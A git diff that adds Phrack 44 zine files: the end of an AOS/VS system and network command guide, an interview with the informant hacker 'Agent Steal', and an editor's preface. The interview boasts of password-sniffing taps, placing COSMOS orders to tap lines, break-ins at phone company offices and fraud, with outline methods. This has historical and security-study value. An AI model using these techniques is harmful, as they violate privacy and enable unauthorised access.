+               be mount (and thus the operator doesn't get prompted when
+               users try to mount it; they immediately get access).
+
+PRIORITY       Changes the priority and/or process type for batches or
+               printing processes.
+
+PROMPTS        Whether EXEC will display the time after each command.
+
+PURGE          Delete all inactive entries in a queue.
+
+QPRIORITY      Limit a batch or device to only job with a certain queue
+               priority (or in a range of priorities).
+
+REFUSED        Refuse a MOUNT request.
+
+RELEASE        Remove a tape unit from the list of mountable unit (it
+               won't be displayed with CONTROL @EXEC UNITSTATUS.
+
+RESTART        Restart a job, and if printer job, can specify from which
+               page until which page to print.
+
+SILENCE        Suppresses EXEC messages about a device or a batch.
+
+SPOOLSTATUS    Give device and queue information.  If no devices or
+               queuenames are given, it reports each spooled device and
+               the queue associated with it, CPL, LPP, headers,
+               trailers, binary mode status, form specifications,
+               priority and process type.
+
+START          Make a connection between a queue and a device.  Jobs for
+               the queue will be run on the device.  This is need for
+               something like printing queues.
+
+STATUS         Describes the status of devices or batches.  It reports
+               the sequence number, queue priority, user, and PID.  For
+               a printer, it also reports the number of pages left and
+               number of copies left.
+
+STOP           Dissociate a queue from a device.
+
+TERMINATE      Terminate the user process on a console (disconnects user).
+
+TRAILERS       Changed number of trailers printed when printing (default
+               is 0).
+
+UNHOLD         Release from HOLD.
+
+UNITSTATUS     Displays mount status of a tape unit or all units if no
+               devicename is specified.
+
+UNLIMIT        Release from LIMIT.
+
+UNSILENCE      Release from SILENCE.
+
+VERBOSE        Give detailed messages.  Brief messages include the
+               queue's name, sequence number and user.  Verbose messages
+               also include the PID and pathname.  Messages are sent
+               when a device or a batch processes a request.
+
+NETWORKING
+~~~~~~~~~
+
+AOS/VS is compatible with several networking protocols.  The most widely
+known and used are X.25 and TCP/IP.  There is also Data General's XODIAC
+network, as well as PCI networks and many others.  In general, network
+services are run as process by the NETOP username (usually "OP"), and
+have programs for the users to execute.  The NETOP process handles
+communications and report generating to the other networking processes.
+It has similar restrictions to that of the EXEC process (one must have
+its username to control it, and so on).
+
+Before going into specifics, there are some general details about
+networks.  Almost everything having to do with networking -- from hosts,
+to help files and programs, will be found in the :NET directory.
+Programs and macros will be in :NET:UTIL, and so on.  The :PER
+directory, which contains devices, contains devices for the networking
+processes.
+
+TCP/IP:  The AOS/VS implementation of TCP/IP incorporates the usual
+TCP/IP programs: rlogin, rsh, telnet, ftp, smtp and so on.  Because of
+the way most of these programs were built (with strong relationships to
+Unix), AOS/VS work in a similar way.
+
+AOS/VS runs RSHD, for remote logging in, and supports individual .RHOST
+files as well as HOSTS.EQUIV files; TELNETD, for telnet sessions; FTPD,
+for ftp sessions; SNMPD, for network management; and SMTP, which is the
+same as activating the AOS/VS SENDMAIL with the become daemon switch,
+for receiving mail.  There are also programs for remote printing and
+dumping of files on tapes, as well as NSLOOKUP and NETSTAT.
+
+In the :ETC directory, there will be some general TCP/IP files, and in
+:USR:LIB there will be spool directories for mail and printing services.
+The files normally found in :ETC will usually match the format and
+function of their counterparts on Unix (for example, :ETC:HOSTS =
+/etc/hosts, and so on).  However, some explaining is necessary.
+
+The file :ETC:PASSWD does not contain any passwords.  It exists for the
+use of the SENDMAIL program, for looking up local users on the machine.
+Thus if someone sends mail to a local user, mail will be sent only if
+that user has an entry in :ETC:PASSWD.  An example file would be,
+
+op::0:::/udd/op:
+mail::8:::/usr/spool/mqueue:
+
+:ETC:SNMPD.TRAP_COMMUNITIES contains a list of hosts, ports, and
+communities that the SNMPD process will send traps to (a SNMP trap is a
+message sent indicating a change of state).
+
+:USR:LIB contains mail programs, such as SENDMAIL's aliases file, the
+SENDMAIL program itself, the SENDMAIL.CF (configuration file) and so on.
+
+:USR:SPOOL contains spool directory, for printing (like LPD) and mail
+(MQUEUE).
+
+The format for sending mail on AOS/VS using SMTP is just like on Unix,
+only the program name is SENDMAIL.
+
+The AOS/VS TCP/IP installation usually comes with TCP libraries, such as
+SOCKIT.LB, which provides ordinary Unix socket functions, from bind(),
+connect(), and listen(), to gethostbyaddr(), getservbyport(), etc;
+making it possible to program and compile network applications using
+TCP/IP routines and the AOS C compiler.
+
+For more information about these services, and network programming, read
+a file about TCP/IP and/or Unix.
+
+AOS/VS NETWORK PROCESSES:  Each network process usually comprises two
+other processes, one for local users, and one for remote users on the
+local host.  RMA provides URMA and SRMA; FTA provides UFTA and SFTA, and
+so on.  What does it mean?  Simply, the S+ programs are "daemons" for
+the network actions, and the U+ programs are user executable programs.
+All the S+ programs are controlled through the NETOP process, while the
+user programs are executed as programs by individual users.
+
+I will take some time to explain these programs and how they work.  RMA
+stands for Resource Management Agent.  FTA stands for File Transfer Agent,
+and VTA stands for Virtual Terminal Agent.  The 'U' in the programs stands
+for "Using" and the 'S' for "Serving."
+
+VTA: the SVTA process provides virtual terminals for remote UVTA users,
+as well as PAD support through PDNs; it controls the system's link to
+any PDN.  Connections can be made from public PADs (like Telenet), and
+through UVTA or any other PAD interface.  SVTA logs command responses
+and errors by reporting them to the NETOP process, or a facility set by
+CONTROL @SVTA SET/OUTPUT= and /LOG=.  If an error occurs during this
+logging, OUTPUT is reset to the NETOP process (if something is faulty
+with the NETOP process, the message is lost).
+
+SVTA is controlled through the NETOP process, so SVTA commands are the
+format of "CONTROL @SVTA <command name>".  SVTA commands:
+
+SET            Sets miscellaneous SVTA parameters, such as whether to
+               include the current time or date at SVTA prompts
+               (/TIME or /NOTIME, /DATE or /NODATE); where and if to send
+               the SVTA process' output (/OUTPUT=[pid #] or [@console] or
+               [process name], or /NOOUTPUT); and where to write SVTA logs
+               (/LOG=file).  Logs files are of format
+               SVTA_month_day_year.LOG and is stored in :NET:LOGFILES
+               (unless changed).
+
+OWNER          Assigns a process name to the SVTA process.  If no name
+               is given, SVTA returns its current process name.
+
+REVERSE        ON or OFF.  Tells SVTA whether or not to accept reverse
+               charged (collect) calls over the PDN.
+
+STATUS         If no argument is given, SVTA issues a global status
+               report.  If an argument is given, it can either be
+               @VCONnn -- an SVTA controlled virtual console, or a PID (a
+               report will be generated for all VCONs owned by that PID).
+
+The user side, UVTA, is loaded by XEQ UVTA.  The user is faced with a
+prompt, from which he can start connections and issue other UVTA
+commands.  UVTA commands:
+
+CALL <host>    First and formost, call a remote host.  A remote host is
+               a host that has its name in the :NET directory (file type
+               HST).  If UVTA can't locate the host in the :NET
+               directory, it reports that the file does not exist.  CALL
+               accepts two arguments, the remote host and the remote
+               process.  Remote process in in the format of [user]:process.
+               [user] defaults to OP; when this parameter is given, UVTA
+               attempts to connect to a VCON controlled by that
+               process/user combination.  The remote process defaults to EXEC
+               (OP:EXEC), which means the user connects to a console controlled
+               by the EXEC program (and faces the usual login procedure).
+               CALL can be replaced by loading UVTA with CALL's
+               parameters.
+
+               Trying to use UVTA as a sort of RLOGIN by connecting to
+               CLIs will probably not work, since unless the remote CLI
+               has opened a VCON, you will get flooded with "Remote user
+               refused connection" error messages, until you abort UVTA
+               or that CLI does open a console -- all of this, of
+               course, assuming that user is there in the first place
+               and you won't get a "Process unknown" error message.
+
+               Once connected, ^C^V will abort the call and the UVTA
+               process.  ^C^T will break from remote mode to the local
+               UVTA prompt.
+
+RCONTROL       The control character (not including Ctrl-C) to break
+               from remote mode to the local prompt.  'A', 'B', 'E', 'Q',
+               'S' and 'V' are taken by the system and cannot be used.
+
+EXECUTE <prog> Execute the parameter issued as a son process of your
+               UVTA (this will fail if you don't have the privilege to
+               create son processes without blocking the father).
+
+The File Transfer Agent, FTA, is something like the FTP port to X.25.
+A user using UFTA can connect to a host running SFTA, supply a valid
+username/password pair, and transfer files from or to the remote host.
+
+A short summary of UFTA commands, in the order they are usually executed:
+
+CALL <host>    Connect to the remote host, given as an argument.
+               Once connected, a ^C^A sequence will abort a transfer in
+               the middle.
+
+USER <account> Supply a username to the remote host, or if no argument
+               is given, assume the local username to be identical to
+               the remote one.  In any case, a password must be
+               supplied.
+
+SUPERUSER      If the user given through USER has Superuser privileges,
+               will turn them for the file transfers (you can now take
+               or put files that you couldn't before, because of the
+               ACLs).
+
+FILES <path>   FILES takes one argument, being the directory which
+               contents will be listed.  FILES takes most arguments the
+               CLI FILES takes (/ASSORTMENT, /TYPE, etc).
+
+TYPE <file>    Display a remote file.
+
+STORE <l> <r>  Transfers the local file, 'l', to the remote destination
+               file, 'r'.  STORE will fail if the user is not privileged
+               for the action, or if he is trying to transfer an
+               irregular file, such as a network host file.
+               Switches are: /APPEND, to append the file to the
+               destination; /COMPRESS, to compress data for the
+               transfer, and /DELETE, to delete the destination file if
+               it already exists.
+               File transfer modes are controlled through the /BLOCK and
+               /RECORD switches.  /BLOCK, the defaults, means
+               block-by-block transfers, and /RECORD means to transfer
+               each record in the file at a time.
+
+RETRIEVE <l> <r>  Transfers a remote file, 'r', to the local destination,
+                  'l'.  The same restrictions and switches for STORE apply
+                  here.
+
+RECOVER <id>   RECOVER is the command used for recovering aborted
+               transfers.  Both STORE and RETRIEVE have another
+               switch called /RECOVER.  When used in conjunction with
+               that switch, the transfer request's working set is kept.
+               Thus, if a transfer was stopped by ^C^A, it can be
+               resumed by RECOVER.  Without the "id" argument, RECOVER
+               lists all the transfer IDs (which are actually interrupted
+               transfers) it can recover.
+
+SEND <msg>     Will send "msg" to the operator on the remote host.
+               The message is sent to the SFTA on the remote host, and
+               forwarded to the operator from there.
+
+The X25 process controls X.25 connection over the AOS/VS network.  It
+controls accounting, virtual connection handling, links, and so on.  X25
+commands, operated through the NETOP process (CONTROL @X25):
+
+ACCOUNT        Enable or disabling the accounting function of X25.
+NOACCOUNT
+
+STATUS <vc#>   Displays the status of a virtual connection.  It displays
+               the remote address, number of packets passed, connection
+               state and the user of the connection.
+
+               Note that virtual connection numbers are reported by X25
+               as octal numbers and are therefore read as such.
+
+CLEAR <vc#>    Clears a virtual connection, after informing its local
+               owner of the clear.
+
+CUSTOMERS      Displays a list of X25 customers, meaning processes which
+               have connected to and have not yet disconnected from X25,
+               and are therefore known by it.
+
+LSTATUS        Displays a status report about a logical link (host).
+               The report gives details about the device status and
+               number of bytes tranfered.
+
+TRACE <file>   Starts a trace of an X.25 connection to the file
+NOTRACE        specified as the argument.  X25 defaults to trace
+               everything -- anything coming out of or going into the
+               system, however this can be overridden by using /LINK=link
+               to trace connections to a specific link, /VC=oct# to
+               trace a specific virtual connection, or PID=pid# to trace
+               virtual connections owned by the process given.
+
+               NOTRACE stops the trace.
+
+               X25 trace files must be displayed through another network
+               utility (not an X25 subcommand), called NTRACE.
+               NTRACE takes as an argument the file in which X25 stores
+               trace info, and displays it in human readable format
+               according to its switches, which are: /DIRECTION=[BOTH|INCOMING
+               |OUTGOING], for packet directions (defaults to BOTH);
+               /LIST=file, for the file to which output goes (defaults
+               to the terminal); RLENGTH=[ALL|#], for the number of
+               bytes from the packets to be displayed (defaults to ALL).
+               The last switch is the packet types to be displayed
+               (default to every packet), and is:
+
+Type                 Incoming calls                  Outgoing calls
+-------------+--------------------------------+--------------------------
+/CALL                Incoming call                  Call request
+/CONNECT             Call connected                 Call connected
+/CI                  Clear Indication               Clear request
+/CCFM                Clear ConFirMation             Clear confirmation
+/DATA                Data                           Data
+/INTERRUPT           Interrupt                      Interrupt
+/INTCFM              Interrupt confirmation         Interrupt confirmation
+/RCVR                RR - receive ready             RR
+/RNR                 RNR - receive not read         RNR
+/REJ                          --                    REJ - reject
+/RSTIND              Reset INDication               Reset request
+/RSTCFM              Reset confirmation             Reset confirmation
+/RRTIND              Restart indication             Restart request
+/RRTCFM              Restart confirmation           Restart confirmation
+
+               The 2nd and 3rd columns in the chart specify what the
+               packet means if the local host is being connected to
+               (incoming call) or is trying to reach another host
+               (outgoing).
+
+RESOURCES <pid> Displays any connections owned by <pid>.  <pid> can be a
+               process ID, or of the format username:processname.
+
+One of the more interesting programs in XODIAC networking is NETGEN.
+NETGEN (in :NET:NETGEN) is a program used to configure the network: host
+addresses, routes, services, and so on.  When NETGEN is loaded, it
+enters interactive mode and enables the user to configure and change
+network settings from menus.  Later, it can be called using its one and
+only switch, /RECREATE=<path>, to re-create the network files in :NET
+according to the specification file given in <path>.
+
+NETGEN's main menu, gives three options (other than terminating).
+Creating or modifying a specification file, and creating configuration
+files.  The specification file contains in it,
+
+     o details pertaining to the local host's configuration on the
+       network: the host ID, host name, domain, etc;
+
+     o hardware device configuration: device name, type, code, and
+       miscellaneous details varying from device type to another;
+
+     o link configuration: link name, device name/type it uses, and
+       (changing on the type of device), network type, line number,
+       protocols, X.25 packet configuration (size/window size/retries),
+       duplex, and more;
+
+     o general network attributes: extended addressing, diagnostics,
+       calling DTE in outgoing calls, etc;
+
+     o X.25 configuration: packet/window size negotiation, reverse
+       charging, NUIs, etc;
+
+     o virtual calls configuration: permanent virtual calls, VC
+       numbering, etc;
+
+     o remote host configuration: X.25 parameters, link to be used,
+       address (decimal/hex), name, host file name, etc;
+
+     o network processes configuration: name, ACL, and other details
+       (varies).
+
+Upon loading NETGEN, there are about three menus branching off from
+every option, so I cannot really mention everything.  However, since
+it's mostly self explanatory, I am putting in here the output from
+NETGEN's Print Specifications entry, edited to show X.25 links through
+Telenet and the local configuration, plus TELNETD.  By looking at it,
+one might learn how NETGEN looks/operates, and what details are
+available.
+
+This file was created using (from the main menu): 2. Access/Update Spec
+File => 7. Print Configurations => file (instead of @LPT).
+
+-----------------------------------------------------------------------------
+
+                       ((Actual details changed.))
+
+                    NETWORK SPECIFICATION PRINT FILE
+
+
+    Specfile: :NET:NETGEN:SPEXBAKZ
+
+    Date: 32-Nov-93
+
+    Time:  4:66:22 PM
+
+
+                          LOCAL HOST CONFIGURATION
+
+
+Local Host Name : PATBBS
+
+ACL : + ORAEW
+
+Host ID : 7
+
+Do you wish to specify an NSAP for this host?: Y
+
+NSAP Address:
+
+    Authority and Format Identifier (AFI) (0-99): 50
+
+    Initial Domain Identifier (Local Form): null
+
+    Domain Specific Part (max 19 ascii characters): patbbs
+
+
+                              DEVICE CONFIGURATION
+
+
+Device Name: ISC_DCF
+
+Device Type  (DCU,MCA,NBS,ISC,PMGR_ASYNC,ILC,
+              ICB,IBC,LLC,SNA,LSC,IDC,LDC,MRC,IRC,LRC,XLC,XSC): ISC
+
+Device code (in octal): 37
+
+Run SDLC or HDLC on this controller: HDLC
+
+
+                               LINK CONFIGURATION
+
+
+Link Name: SPRINTNET                    Device Name: ISC_DCF
+
+                                        Device Type: ISC
+
+Network Type : TELENET                  Line # (0-7) : 0
+
+Protocol Type(LAP,LAPB,SDLC) : LAPB
+
+Local Host Address (2-15 decimal digits) : 31109090063100
+
+Sequence Numbering Modulus (8,128) : 8
+
+Connect retry count (0-99)   :   20     Transmit retry count (0-99)  :    10
+
+Transmit timeout (-1,0-3600) :    3     Enable timeout (-1,0-3600)   :    30
+
+Frame Window Size (1-7)      :    7     Packet Window Size (1-7)     :     2
+
+                            Max Packet Size (32,64,128,256,512,1024) :   128
+
+Framing Type (HDLC,BSC)      : HDLC     HDLC Encoding (NRZ,NRZI)     :   NRZ
+
+Clocking (EXTERNAL,INTERNAL) : EXTERNAL
+
+FULL or HALF duplex line     : FULL
+
+
+--------------------------  Virtual Call Numbering  --------------------------
+
+
+# PVC'S :   0                           # SVC'S :  63   Start SVC # :    1
+
+
+------------------------------------------------------------------------------
+
+
+  Network Attributes
+  ------------------
+
+          Calling DTE in Outgoing Calls (Y/N): Y
+          Personal Cause Code (Y/N)          : N
+          Long Interrupt Packets (Y/N)       : N
+          Timeout Resets (Y/N)               : Y
+          Timeout Clears (Y/N)               : Y
+          Mandatory Diagnostics (Y/N)        : N
+          Extended Addressing (Y/N)          : Y
+          Extended Clear Packets (Y/N)       : Y
+
+  X25 Facilities Enabling
+  -----------------------
+
+          Allow packet size negotiation (Y/N)  : Y
+          Allow window size negotiation (Y/N)  : Y
+          Allow fast select (Y/N)              : Y
+              1. local connections (Y/N)       : N
+              2. routed connections (Y/N)      : N
+          Allow reverse charging outgoing (Y/N): Y
+          Allow closed user groups (Y/N)       : Y
+          Allow network user ID (Y/N)          : Y
+          Allow throughput class (Y/N)         : Y
+          Allow transit delay (Y/N)            : Y
+          Allow transit delay indication (Y/N) : Y
+          Allow charging information (Y/N)     : Y
+          Allow RPOA selection (Y/N)           : Y
+          Allow user defined facilities (Y/N)  : Y
+          Allow unknown facilities (Y/N)       : Y
+          Allow extended facilities (Y/N)      : Y
+          Allow facilities to be routed (Y/N)  : Y
+
+ X25 Facilities           Generated?
+------------------------- ---------
+
+ 1. Packet Size Facility      N    Minimum:  32             Maximum:     128
+ 2. Window Size Facility      N    Minimum:  1              Maximum:     2
+ 3. Fast Select Facilities    N    Type:
+ 4. Reverse Charging          N
+ 5. Closed User Groups        N    Type:     None           ID:          --
+ 6. Network User ID           N    ID:
+ 7. Throughput Class          N    Called:                  Calling DTE:
+ 8. Transit Delay             N    Delay:    0
+ 9. Charging Information      N    Request?  N
+10. RPOA Selection            N    # IDs:    0
+11. User Defined Facilities   N
+12. Other Facilities          N
+
+
+                            REMOTE HOST CONFIGURATION
+-----------------------------------------------------------------------------
+
+
+BOOMBOOM
+
+                            X.25 Host Parameters
+
+
+    Remote Host Filename : BOOMBOOM
+
+    Remote Host Name     : BOOMBOOM
+
+    Remote Host ID       : None
+
+    Hostfile AOS/VS ACL  : + RE
+
+    Accepts address extension facilities?: N
+
+
+  Link Name        Device Type   Network Type    Remote Address
+
+1 SPRINTNET        ISC           TELENET        host address in decimal :
+
+                                                  31109200010200
+
+
+-----------------------------------------------------------------------------
+                                NPN CONFIGURATION
+-----------------------------------------------------------------------------
+
+TELNETD
+
+    NPN-type entry name:  TELNETD
+    NPN:                  0023
+    NPN AOS/VS ACL:       + RE
+-----------------------------------------------------------------------------
+
+
+ACRONYMS
+~~~~~~~~
+
+ADM       Automatic Density Matching
+CLASP     CLass Assignment And Scheduling Package
+CLI       Command Line Interpreter
+CPL       Characters per Line
+IPC       Inter-Process Communications
+LPP       Lines per Page
+PID       Process ID; PID 2 is the "master CLI"
+SMI       System Manager Interface
+
+
+ 
diff --git a/phrack44/16.txt b/phrack44/16.txt
new file mode 100644
index 0000000..0ff6e98
--- /dev/null
+++ b/phrack44/16.txt
@@ -0,0 +1,355 @@
+                             ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 16 of 27
+
+****************************************************************************
+
+
+An Interview With Agent Steal
+By Mike Bowen, Agenta  Aka Agent 005
+
+Please note that all of the information in this interview is
+documented in F.B.I. files and can be verified.
+______________________________________________________________________
+
+MB: Well I guess the first question is the biggest one. Is it true that
+    you are an F.B.I. informant?
+
+AS: Yes.
+
+MB: Why?
+
+AS: First of all I didn't have that much of a choice. If I didn't
+    cooperate with The Bureau, I could have been charged with possession
+    of classified government material. That carries a penalty of over
+    10 years. There is not a lot of people that I would go to jail that
+    long for. I was able to keep my two closest friends out of trouble.
+    That was part of my deal. It was already too late for Kevin Poulson
+    and Ronald Austin.
+
+MB: Yeah, I think that most hackers would have done the same as you.
+
+AS: Most hackers would have sold out their mother.
+
+laughter
+
+MB: How come you never busted me?
+
+AS: Well I certainly had the opportunity to. You probably remember that
+    I was calling you about a year ago and poking you for information.
+    I just didn't consider you to be a dangerous or malicious hacker.
+
+MB: Thanks, I guess.
+
+AS: Just make your check out to....
+
+laughter
+
+MB: As everyone should know, Kevin Poulson "Dark Dante" was your partner.
+    That was what you referred to in your BBS posts as The Inner Circle
+    1990. Poulson was featured on TV's' Unsolved mysteries as a wanted
+    fugitive hacker. The United States Attorney called him, "The Hannibal
+    Lecter of computer crime".
+
+AS: I would not compare him to Lecter, I would say he is more of a
+    G. Gordon Liddy.
+
+laughter
+
+MB: Regardless, Kevin is now in jail awaiting trial in San Francisco. He
+    has been there for two years and when he is done, there are more
+    charges awaiting him in Los Angeles. He may spend up to 15 years
+    in prison. How much time do you think that you will do?
+
+AS: The six months I did in Texas while I was negotiating my plea agreement
+    will probably be it.
+
+MB: How many people did you have to bust to get out of that one?
+
+AS: I'm not at liberty to say
+
+MB: I see. So are you still involved with the F.B.I.?
+
+AS: I believe that my cover is pretty much blown at this time so my
+    usefulness is limited. I would say that I'm done. However, I have
+    received several other offers to work with other computer security
+    related organizations. So watch your asses kiddies, it's easy to
+    change my handle!
+
+MB: Why do you think you are getting these offers? You are a convicted felon.
+
+AS: I guess I have an honest face, heh, and the work I did for the
+    bureau was very good. I think I was cut out to be in the investigative
+    business.
+
+MB: Well, you have been working for private investigators for quite some time.
+
+AS: Yes, I handled all of their computer information searches in addition to
+    phone tapping, break ins, phone tap and bug detection.
+
+MB: Was that profitable?
+
+AS: Well, in addition to all of those radio station contests we were
+    winning, I was doing OK. Driving a Porsche and living in Beverly
+    Hills wasn't to bad.
+
+MB: I guess all good things come to an end.
+
+AS: I will always manage some how, I'm a survivor.
+
+MB: There was another partner involved with you. Wasn't his name Ron Austin?
+
+AS: Yes, he got busted too.
+
+MB: How much trouble is he in?
+
+AS: He is going to testify against Poulson also, so he'll probably only get
+    a year or two.
+
+MB: Are you two still friends?
+
+AS: Very much so. He understood the situation I was in. I still talk to him
+    frequently.
+
+MB: What is he up to these days?
+
+AS: He told me he was going to find a cause and become the first computer
+    hacker turned international terrorist.
+
+laughter
+
+MB: I wouldn't want to be his enemy! Speaking of enemies, what do you think
+    Poulson will do to all the people who testified against him when he gets
+    out?
+
+AS: Well he is going to be busy. Everyone who he has ever known has turned
+    against him.
+
+MB: Well if he wasn't such a sneaky jerk maybe someone would like him.
+
+AS: He brought it on himself.
+
+MB: Do you expect any retaliation from the hacker community?
+
+AS: There will probably be a few narrow minds out there. However, I have
+    been very careful to conceal my true identity. People may know my real
+    name if they read the papers, but that won't get them far. I find
+    people for a living, I don't think it will be hard to use what I know
+    to keep a low profile. Besides, what is a hacker going to do, turn off
+    my phone? Regardless, If some one fucks with me, I'll just have to fuck
+    back. I have a lot of friends and resources now.
+
+MB: What was it like working with the F.B.I.?
+
+AS: Very interesting and educational. I have learned a lot about how the
+    bureau works. Probably too much. Obviously I can't say very much.
+    However, I can say that my involvement was extensive. There was a lot
+    of money and resources used. In addition, they paid me well.
+
+MB: Would you say it was fun?
+
+AS: Most of the time. They actually flew me to Summer Con in St. Louis.
+    I would say the bureau had that conference pretty well covered.
+    Erik Bloodaxe was there too. It was pretty funny. I think we both knew
+    that each other was working for the bureau. One of the agents I worked
+    with let it slip out. We were sitting across from each other at the
+    conference, kind of smirking at each other. And the balls Erik had!
+    He video taped the whole thing! It was classic.
+
+MB: What was the F.B.I. trying to accomplish?
+
+AS: I believe they were trying to send a message that high level computer
+    hacking is something that is very serious. In Poulson's' case as you are
+    aware, we got into some really heavy shit. So heavy in fact that I had
+    to sign an agreement that I would never disclose any of the top secret
+    information that I had seen.
+
+MB: That's pretty wild. The article about Poulson, Austin and you in
+    The Los Angeles Times Sunday Magazine was really interesting. For
+    those who want to read it the date was September 12, 1993.
+
+AS: I was amazed how deep that reporter was able to go. He really hit the
+    nail on the head. Personally I think he wrote too much. He wrote that
+    we were able to get a list of every federal wire tap in California!
+
+MB: Really?
+
+laughter
+
+AS: Like I said, I can neither confirm or deny that statement. There is
+    still a lot of information regarding our activities that has not been
+    published. Between the three of us, we were into a bunch of shit. One
+    of these days, it will all be out.
+
+MB: The reporter also said you would take control of phone lines with
+    a telephone company computer. Then you would seize radio station lines
+    and win contests.
+
+AS: Now that we can talk about. We won tens of thousands of dollars, trips
+    to Hawaii and a few Porsches. The government took both of my Porsches
+    away from me.
+
+MB: I didn't realize that you had two.
+
+AS: Yeah, a friend of mine was selling his. So I had him report it stolen
+    and collect the insurance. I gave him a $1000 and it was mine. I
+    loved that car.
+
+MB: I see that was the interstate transportation of a stolen automobile
+    charge that was filed in Texas?
+
+AS: Yeah , I changed the VIN numbers and everything. It was really clean.
+    However, when I got raided they went over everything with a fine tooth
+    comb. There were so many agencies involved. The F.B.I., The Secret
+    Service , SW Bell Security, Pacific Bell Security, Dallas Sheriff,
+    L.A.P.D. Computer Crime Unit, The United States Postal Inspector,
+    Telenet and Tymnet Security and eventually The Department of Motor
+    Vehicles Security Unit. What a mess, everyone wanted a piece of
+    the action. But you know who always gets their man.
+
+MB: The Bureau.
+
+AS: Yep, pissed a few people off too.
+
+MB: Where did you get the name Agent Steal?
+
+AS: About ten years ago, I was under investigation by The Secret Service
+    for computer hacking. The case agent was Special Agent Steele. That
+    is when I became a fugitive. I left town, dropped contact with my
+    friends, and changed my name. I moved to California.
+
+MB: What are some of your favorite hacks?
+
+AS: Probably the Telenet tap I put up.
+
+MB: You mean the private dial up tap that you had told me about?
+
+AS: Yeah, I placed the order in COSMOS for a bridge lifter on the first
+    line in hunt of my local Telenet dial up and a 1FR to appear in an
+    office building a half mile from the LA Telenet dial up.
+
+MB: That was great. That device you built was cool. All you had to do was
+    dial up the number, connect with your modem and you could sit there
+    and watch people type in their passwords all day long.
+
+AS: I must have snagged over 500 accounts on that thing.
+
+MB: That's where you got your DMV account wasn't it?
+
+AS: Yes. I made a small fortune reselling the information to P.I.s'
+
+MB: What was it you told me about tapping Heidi Fliess?
+
+AS: Yeah. I tapped the phone of one of her working girls. It was for this
+    rich guy who would hire hookers and then get involved with them. He
+    loved hookers. He used to keep tabs on this one.
+
+MB: What were the conversations like.
+
+AS: I rarely would listen to the tapes I made. I have a life, thank you.
+    Besides, I have found that about 99.9% of all phone conversations
+    are really boring.
+
+MB: Have you listened to many?
+
+AS: Thousands, from cellular to cordless to inter office T-carrier lines
+    to long distance microwave. I guess I am a phone tap expert. Poulson
+    and I would break into C.O.s on a regular basis. We had our own keys
+    and I.D. badges. We came and went as we pleased. I would sometimes
+    play around with the long distance trunks. That was always interesting.
+    With a T-carrier test set you could scan through all of the channels
+    and hear dozens of phone calls with the flick of a switch.
+
+MB: What is the most powerful computer that you had access to.
+
+AS: Good question. There really isn't one computer system out there that
+    is "all" powerful, with the exception of maybe some defense
+    computers. I made a point of staying away from those. However, if
+    I had to pick just one computer to have access to I would say it
+    was XXXXXXX. That was the Pacific Bell system that allowed us to
+    drop in and monitor and control phone lines from home with the use
+    of a computer system. Second would have to be DMV or COSMOS.
+    Yes COSMOS. I thought that being able to place my own orders was
+    important, not to mention more reliable than the business office.
+
+MB: Cheaper too.
+
+laughter
+
+AS: I wish I had all the money I have saved on phone bills!
+
+MB: Those days are gone.
+
+AS: At least the days of doing that safely. People tend to get pessimistic
+    about hacking. I have heard some say that the good old days of boxing
+    and such are gone. I disagree, we just have to adapt. As sure as
+    technology advances so will hacking. There will always be new "hacks".
+    It's up to the real hackers to find them. Learn from the past and move
+    on or get busted and quit.
+
+MB: What is up with Kevin Mitnick?
+
+AS: I had never met him before I was busted. When I went to work for the
+    bureau I contacted him. He was still up to his old tricks so we opened
+    a case on him and Roscoe. It's a long story but they wound up getting
+    busted again. Mitnick got tipped off right before they were going to
+    pick him up. So he's on the run again. Roscoe wasn't so lucky. This
+    will be Mitnick's fifth time to get busted. What a loser. Everyone
+    thinks he is some great hacker. I out smarted him and busted him.
+    Poulson blows him away as well.
+
+MB: Do you feel bad about working undercover to arrest hackers?
+
+AS: Not really. We all know the risks. For me it was just a job. And an
+    interesting one at that. I wasn't out there just busting anyone. We
+    were looking for the hard core malicious hackers. I passed up a lot
+    of people in the course of the investigation. They should know who
+    they are by now. The ones that got taken down deserved it. It will
+    all be in the papers some day.
+
+MB: Did you deserve what you got.
+
+AS: Yeah, I was getting pretty carried away there for a while. I invaded a
+    lot of peoples privacy. Phones taps, credit reports, breaking into
+    Pacific Bell offices etc.
+
+MB: Didn't you break into PacBells' security department?
+
+AS: Yes, Poulson and I broke into the high rise downtown. We wanted to
+    find out how far their investigation of us had gone.
+
+MB: Did you find what you wanted?
+
+AS: Yeah, DNR print outs, notes and photos! We also found a lot of
+    information regarding other investigations and how they do wire taps.
+
+MB: Very dangerous in the wrong hands.
+
+AS: We are the wrong hands.
+
+laughter
+
+MB: Oh yeah. How did you get caught?
+
+AS: Well as you know I moved to Texas after that high speed chase with the
+    L.A.P.D. undercover units. I found out that I was under surveillance
+    and had to make a run for it!
+
+MB: Was that pretty close?
+
+AS: In a Porsche on a canyon road? Not until the helicopter appeared!
+
+MB: How did you get away?
+
+AS: I parked the car in a garage after losing them then hid under another
+    car for three hours. They eventually gave up looking. I called a
+    cab with my cellular phone and left the area. Getting back to getting
+    caught. I believe it was from an elaborate multi-company phone trace.
+    I didn't think that they would go through all the trouble to try and
+    trace my calls though several carriers. But I guess they did. The
+    Pacific Bell people were very hot for me. They must have pulled everyone
+    together.
+
+MB: This sounds like a book or a made for TV movie.
+
+AS: One can only hope.
diff --git a/phrack44/17.txt b/phrack44/17.txt
new file mode 100644
index 0000000..a1ed04b
--- /dev/null
+++ b/phrack44/17.txt
@@ -0,0 +1,367 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 17 of 27
+
+****************************************************************************
+
+
+
+[Editor's commentary:
+
+ What you are about to read is a file that everyone's friend
+ Pat (Visionary / Traxxter) had written some time ago and is
+ currently being spreading around the net.  Bear in mind that
+ this file is exactly as he wrote it.  (IE: no spell-checking
+ or other editing has been done.)
+
+ I want to add something from my own personal experience with
+ Traxxter.  At Comsec one evening, we received a phone call from
+ Pat.  Scott and I took the call and listened to Pat for nearly
+ an hour.  During this call Pat continually over-stressed the
+ point about how much he hated being called a narc.  He said
+ "I know you guys understand about turning people in, now that
+ you are doing Comsec."  In his thinking that by our new charter
+ as security consultants we were suddenly policemen as well,
+ he went into a big spiel about his involvement with security
+ officers at long distance carriers and how he regularly provided
+ information to them.
+
+ Now, you may feel that whatever transgressed between Pat and
+ the locals causing him and his family so many problems
+ may or may not warrant the action that was taken by them.
+ I personally follow a simple rule regarding such things:
+ If you mess with me at home it's just a pissing match and I'll
+ insult you back night and day, but if you try to come between me
+ and my livelihood or my ability to work or put food on my table
